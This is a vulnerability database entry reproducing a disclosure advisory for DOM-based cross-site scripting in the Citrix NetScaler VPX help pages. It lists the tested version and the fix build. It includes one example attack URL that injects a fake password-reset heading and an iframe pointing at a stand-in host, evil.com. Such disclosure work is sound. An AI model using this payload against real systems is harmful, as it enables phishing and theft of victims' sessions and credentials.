Sign-up

ID

VAR-E-201503-0117


TITLE

Citrix NetScaler VPX Cross Site Scripting

Trust: 0.5

sources: PACKETSTORM: 130936

DESCRIPTION

It was discovered that the help pages of Citrix VPX are vulnerable to cross site scripting.

Trust: 0.5

sources: PACKETSTORM: 130936

AFFECTED PRODUCTS

vendor:citrixmodel:netscaler vpxscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 130936

EXPLOIT

------------------------------------------------------------------------
Citrix NetScaler VPX help pages are vulnerable to Cross-Site Scripting
------------------------------------------------------------------------
Han Sahin, August 2014

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the help pages of Citrix VPX are vulnerable to
Cross-Site Scripting. This issue allows attackers to perform a wide
variety of actions, such as stealing the victim's session token or login
credentials, performing arbitrary actions on the victim's behalf, and
logging their keystrokes.

------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was discovered in Citrix NetScaler VPX NSVPX-ESX-10.5-50.10,
other versions may also be vulnerable.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Citrix reports that this vulnerability is fixed in NetScaler 10.5 build
52.8nc.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20140807/citrix_netscaler_vpx_help_pages_are_vulnerable_to_cross_site_scripting.html

This issue exists because the value of the searchQuery URL parameter is assigned client-side to contentDiv.innerHTML (DOM-based Cross-Site Scripting), for example:

https://<target>/help/rt/large_search.html?searchQuery=<h1>Reset your password below:<h1><iframe src='http://www.evil.com'/>&type=ctxTV

Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Trust: 0.5

sources: PACKETSTORM: 130936

EXPLOIT HASH

LOCAL

SOURCE

md5: 50c91a8bdcdd159b0b9034e8ccc241ed
sha-1: 89ce10965f63df5c7dbda31db7e7c6ec1578a536
sha-256: d441a8929d46f3b81888279baadee2699e3507b40eda951a86945b935b33baac
md5: 50c91a8bdcdd159b0b9034e8ccc241ed

Trust: 0.5

sources: PACKETSTORM: 130936

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 130936

TYPE

xss

Trust: 0.5

sources: PACKETSTORM: 130936

TAGS

tag:exploit

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 130936

CREDITS

Han Sahin

Trust: 0.5

sources: PACKETSTORM: 130936

EXTERNAL IDS

db:PACKETSTORMid:130936

Trust: 0.5

sources: PACKETSTORM: 130936

SOURCES

db:PACKETSTORMid:130936

LAST UPDATE DATE

2022-07-27T09:51:57.608000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:130936date:2015-03-20T06:16:32